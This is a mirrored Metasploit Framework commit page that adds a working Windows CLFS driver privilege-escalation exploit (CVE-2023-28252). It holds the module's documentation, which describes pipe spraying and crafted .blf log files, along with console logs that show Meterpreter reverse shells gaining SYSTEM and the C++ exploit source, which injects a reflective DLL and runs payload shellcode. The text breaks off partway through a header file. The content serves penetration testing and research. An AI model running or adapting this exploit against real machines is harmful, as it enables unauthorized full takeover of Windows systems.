github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-09 04:26:11 +02:00
Code Releases Activity

Land #18250, CVE-2023-28252: Windows CLFS Driver Privilege Escalation

Browse Source
This commit is contained in:
Simon Janusz 2023-09-14 10:18:29 +01:00 committed by GitHub
commit 8b56dc0117
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
13 changed files with 8795 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2023-28252/CVE-2023-28252.x64.dll Executable file
View File

Binary file not shown.

129
documentation/modules/exploit/windows/local/cve_2023_28252_clfs_driver.md Normal file
View File

@ -0,0 +1,129 @@
## Vulnerable Application
A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on
Windows 10 21H2, Windows 11 21H2 and Windows Server 2022 (Build 20348) operating systems.
The clfs.sys driver contains a function CreateLogFile that is used to create
open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which
contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a
.blf file. However, these files can be edited with CreateFileA or with fopen and then modified with
WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.
This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique
mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of
bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe
that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially
crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.
The exploits creates a controlled memory space by first looping over the CreatePipe function to
to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of
pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the
0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.
This is a very brief and high overview description of what the exploit is actually doing. For a more detailed and in
depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).
### Installation And Setup
Windows 11 versions 21H2 are vulnerable out of the box.
This exploit module has been tested on Windows 11 versions 21H2 build 22000.
## Options
## Verification Steps
1. Start msfconsole
1. Get a Meterpreter session on a vulnerable host
1. Do: `use windows/local/cve_2023_28252_clfs_driver`
1. Set the `SESSION` and `PAYLOAD` options
1. Do: `run`
1. You should get a privileged session.
## Scenarios
### Windows Server 2022 Build 20348 x64
```
msf6 exploit(multi/handler) > use windows/local/cve_2023_28252_clfs_driver
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > run
[*] Started reverse TCP handler on 172.16.199.1:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
[*] Launching msiexec to host the DLL...
[+] Process 6080 launched.
[*] Reflectively injecting the DLL into 6080...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200774 bytes) to 172.16.199.134
[*] Meterpreter session 11 opened (172.16.199.1:4443 -> 172.16.199.134:49864) at 2023-07-31 13:44:35 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-2EEL7BRDUD8
OS : Windows 2016+ (10.0 Build 20348).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
```
### Windows 11 Version 21H2 Build 22000 x64
```
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions -i 1
[*] Starting interaction with 1...
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 172.16.199.1:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.22000.0 which has a vulnerable version of clfs.sys installed by default
[*] Checking compatibility
[*] Launching netsh to host the DLL...
[+] Process 9124 launched.
[*] Reflectively injecting the DLL into 9124...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200774 bytes) to 172.16.199.132
[*] Meterpreter session 4 opened (172.16.199.1:4443 -> 172.16.199.132:49894) at 2023-07-31 11:24:01 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : MSFDEVICE
OS : Windows 10 (10.0 Build 22000).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
```
### Windows 10 Version 19042 x64
```
msf6 exploit(multi/handler) > use windows/local/cve_2023_28252_clfs_driver
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > run
[*] Started reverse TCP handler on 172.16.199.1:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.19042.0 which has a vulnerable version of clfs.sys installed by default
[*] Launching netsh to host the DLL...
[+] Process 4888 launched.
[*] Reflectively injecting the DLL into 4888...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200774 bytes) to 172.16.199.131
[*] Meterpreter session 13 opened (172.16.199.1:4443 -> 172.16.199.131:49840) at 2023-07-31 14:34:37 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-8ATHH6O
OS : Windows 10 (10.0 Build 19042).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
```

31
external/source/exploits/CVE-2023-28252/CVE-2023-28252.sln vendored Executable file
View File

@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.33801.447
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2023-28252", "CVE-2023-28252\CVE-2023-28252.vcxproj", "{C1983EC8-C84D-4284-85CA-AF4F06AE0398}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Debug|x64.ActiveCfg = Debug|x64
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Debug|x64.Build.0 = Debug|x64
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Debug|x86.ActiveCfg = Debug|Win32
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Debug|x86.Build.0 = Debug|Win32
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Release|x64.ActiveCfg = Release|x64
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Release|x64.Build.0 = Release|x64
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Release|x86.ActiveCfg = Release|Win32
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {3FD03BC0-5F34-4393-AEB8-3B2F1EC49E5B}
EndGlobalSection
EndGlobal

240
external/source/exploits/CVE-2023-28252/CVE-2023-28252/CVE-2023-28252.vcxproj vendored Executable file
View File

@ -0,0 +1,240 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<ProjectGuid>{c1983ec8-c84d-4284-85ca-af4f06ae0398}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>CVE_2023_28252</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<TreatWarningAsError>false</TreatWarningAsError>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableUAC>false</EnableUAC>
<GenerateMapFile>true</GenerateMapFile>
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;..\..\..\include\windows;..\..\include\windows;..\include\windows;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<TreatWarningAsError>false</TreatWarningAsError>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableUAC>false</EnableUAC>
<GenerateMapFile>true</GenerateMapFile>
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>false</FunctionLevelLinking>
<IntrinsicFunctions>false</IntrinsicFunctions>
<SDLCheck>
</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<TreatWarningAsError>false</TreatWarningAsError>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableUAC>false</EnableUAC>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<GenerateMapFile>false</GenerateMapFile>
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>false</FunctionLevelLinking>
<IntrinsicFunctions>false</IntrinsicFunctions>
<SDLCheck>
</SDLCheck>
<PreprocessorDefinitions>NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;..\..\..\include\windows;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<TreatWarningAsError>false</TreatWarningAsError>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableUAC>false</EnableUAC>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<GenerateMapFile>false</GenerateMapFile>
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="clfs_eop.cpp" />
<ClCompile Include="dllmain.cpp" />
<ClCompile Include="exploit.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="clfs_eop.h" />
<ClInclude Include="crc32.h" />
<ClInclude Include="exploit.h" />
<ClInclude Include="ntos.h" />
</ItemGroup>
<ItemGroup>
<Library Include="ntoskrnl.lib" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

1417
external/source/exploits/CVE-2023-28252/CVE-2023-28252/clfs_eop.cpp vendored Executable file
View File

File diff suppressed because it is too large Load Diff

121
external/source/exploits/CVE-2023-28252/CVE-2023-28252/clfs_eop.h vendored Executable file
View File

@ -0,0 +1,121 @@
//
//
#pragma warning (disable : 4005)
#pragma warning(disable:28159)
#pragma once
#include <stdio.h>
#include <iostream>
#include <windows.h>
#include <clfsw32.h>
#include <ntstatus.h>
#include <processthreadsapi.h>
#include <tlhelp32.h>
#include "ntos.h"
#include "crc32.h"
#pragma comment(lib, "ntdll.lib")
#pragma comment(lib, "Clfsw32.lib")
VOID FindKernelModulesBase();
//
// NT syscalls
//
#define SystemModuleInformation 0xb
#define SystemHandleInformation 0x10
typedef struct _SYSTEM_BIGPOOL_ENTRY {
union {
PVOID VirtualAddress;
ULONG_PTR NonPaged : 1;
};
SIZE_T SizeInBytes;
union {
UCHAR Tag[4];
ULONG TagUlong;
};
} SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY;
typedef struct _SYSTEM_BIGPOOL_INFORMATION {
ULONG Count;
SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];
} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;
typedef NTSTATUS(WINAPI* _NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* _NtWriteVirtualMemory)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);
//
// Version dependent offsets
//
#define OFFSET_OF_PREVIOUS_MODE 0x232
#define OFFSET_OF_WIN32PROCESS 0x3b0
#define OFFSET_OF_SEP_TOKEN_PRIVILEGES 0x40
#define OFFSET_OF_DCOMPOSITIONPROCESS 0x100
//
// CInteractionTrackerMarshaler object offsets
//
#define OFFSET_OF_FUNCTION 0x50
#define OBJECT_SIZE 0x1a0
typedef NTSTATUS func(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);
typedef NTSTATUS func3(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);
class clfs_eop
{
public:
clfs_eop() {};
~clfs_eop() {};
//int crcCalculatorAndFix(char*, int);
void fun_pipeSpray(int value, UINT64* temp_buffer);
void getVirtualAddress();
SIZE_T GetObjectKernelAddress(HANDLE Object);
VOID InitEnvironment();
int createInitialLogFile();
UINT64 getBigPoolInfo();
VOID craftbaseFile(FILE* pfile);
VOID craftSprayFile(FILE* pfile);
int FixCRCFile(WCHAR* _stored_temp_open);
int crcCalculatorAndFix(char* mybuf, int mysize);
int doFirstAlloc();
VOID FindKernelModulesBase();
void manage_args(int argc, TCHAR* argv[]);
VOID RunPayload();
void fun_prepare();
WCHAR* logFileNames(int _i);
WCHAR* containerNames(int _i);
WCHAR* fileNames(int _i);
int fun_trigger(WCHAR* _logfilename, WCHAR* _fopenfilename);
void to_trigger();
};

45
external/source/exploits/CVE-2023-28252/CVE-2023-28252/crc32.h vendored Executable file
View File

@ -0,0 +1,45 @@
#pragma once
#include <stdint.h>
struct crc32
{
static void generate_table(uint32_t(&table)[256])
{
uint32_t polynomial = 0xEDB88320;
for (uint32_t i = 0; i < 256; i++)
{
uint32_t c = i;
for (size_t j = 0; j < 8; j++)
{
if (c & 1) {
c = polynomial ^ (c >> 1);
}
else {
c >>= 1;
}
}
table[i] = c;
}
}
static uint32_t update(uint32_t(&table)[256], uint32_t initial, const void* buf, size_t len)
{
uint32_t c = initial ^ 0xFFFFFFFF;
const uint8_t* u = static_cast<const uint8_t*>(buf);
for (size_t i = 0; i < len; ++i)
{
c = table[(c ^ u[i]) & 0xFF] ^ (c >> 8);
}
return c ^ 0xFFFFFFFF;
}
};
// usage: the following code generates crc for 2 pieces of data
// uint32_t table[256];
// crc32::generate_table(table);
// uint32_t crc = crc32::update(table, 0, data_piece1, len1);
// crc = crc32::update(table, crc, data_piece2, len2);
// output(crc);

44
external/source/exploits/CVE-2023-28252/CVE-2023-28252/dllmain.cpp vendored Executable file
View File

@ -0,0 +1,44 @@
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#define DEBUGTRACE 1
#include "ReflectiveLoader.c"
#include "definitions.h"
#include "common.h"
#include <stdio.h>
#include <stdint.h>
#include <windows.h>
DWORD Exploit(PMSF_PAYLOAD pPayload);
void main(PMSF_PAYLOAD lpReserved) {
dprintf("In dllmain main method, heading to exploit method");
Exploit(lpReserved);
return;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
PMSF_PAYLOAD payload = (PMSF_PAYLOAD)lpReserved;
switch (dwReason)
{
case DLL_QUERY_HMODULE:
hAppInstance = hinstDLL;
if (lpReserved != NULL)
{
*(HMODULE*)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
main(payload);
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}

66
external/source/exploits/CVE-2023-28252/CVE-2023-28252/exploit.cpp vendored Executable file
View File

@ -0,0 +1,66 @@
#pragma once
#include "common.h"
#include "clfs_eop.h"
#include "exploit.h"
#include <tchar.h>
void ExecutePayload(PMSF_PAYLOAD pMsfPayload) {
PVOID pPayload = VirtualAlloc(NULL, pMsfPayload->dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!pPayload) {
exit;
}
CopyMemory(pPayload, &pMsfPayload->cPayloadData, pMsfPayload->dwSize);
// Get the current process token
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_DUPLICATE, &hToken)) {
VirtualFree(pPayload, 0, MEM_RELEASE); // Clean up allocated memory
exit;
}
// Duplicate the token
HANDLE hDupToken;
if (!DuplicateToken(hToken, SecurityImpersonation, &hDupToken)) {
CloseHandle(hToken);
VirtualFree(pPayload, 0, MEM_RELEASE); // Clean up allocated memory
exit;
}
// Close the original token handle
CloseHandle(hToken);
// Create thread to execute payload code
HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pPayload, NULL, 0, NULL);
if (!hThread) {
// Handle thread creation error
CloseHandle(hDupToken);
VirtualFree(pPayload, 0, MEM_RELEASE); // Clean up allocated memory
exit;
}
// Wait for the thread to finish if needed
WaitForSingleObject(hThread, INFINITE);
// Clean up handles and allocated memory
CloseHandle(hThread);
CloseHandle(hDupToken);
VirtualFree(pPayload, 0, MEM_RELEASE);
}
DWORD Exploit(PMSF_PAYLOAD pPayload) {
clfs_eop ce = clfs_eop::clfs_eop();
ce.getVirtualAddress();
ce.InitEnvironment();
ce.doFirstAlloc();
ce.createInitialLogFile();
ce.fun_prepare();
ce.to_trigger();
ExecutePayload(pPayload);
return 0;
}

121
external/source/exploits/CVE-2023-28252/CVE-2023-28252/exploit.h vendored Executable file
View File

@ -0,0 +1,121 @@
#pragma once
#include <Windows.h>
#pragma once
#include "ntos.h"
#include <windows.h>
#include <ntstatus.h>
#ifndef NTSTATUS
typedef long NTSTATUS;
#endif
typedef NTSTATUS(__stdcall* fNtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(__stdcall* fNtCallbackReturn)(
PVOID Result,
ULONG ResultLength,
NTSTATUS CallbackStateus
);
typedef NTSTATUS(__stdcall* fNtUserConsoleControl)(
DWORD ConsoleCtrl,
PVOID ConsoleCtrlInfo,
ULONG ConsoleCtrlInfoLength
);
typedef NTSTATUS(__stdcall* fNtUserMessageCall)(
HWND hWnd,
UINT msg,
WPARAM wParam,
LPARAM lParam,
ULONG_PTR ResultInfo,
DWORD dwType,
BOOL bAscii
);
typedef PVOID(__stdcall* fRtlAllocateHeap)(
PVOID HeapHandle,
ULONG Flags,
SIZE_T Size
);
typedef VOID(__stdcall* fRtlGetNtVersionNumbers)(
DWORD* MajorVersion,
DWORD* MinorVersion,
DWORD* BuildNumber
);
#define TYPE_WINDOW 1
typedef PVOID(__stdcall* fHMValidateHandle)(HANDLE hHandle, DWORD dwType);
//
// Taken from ntdef.h
//
//
// Taken from wdm.h
//
typedef NTSTATUS(__stdcall* fNtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(__stdcall* fNtCreateFile)(
PHANDLE FileHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
PIO_STATUS_BLOCK IoStatusBlock,
PLARGE_INTEGER AllocationSize,
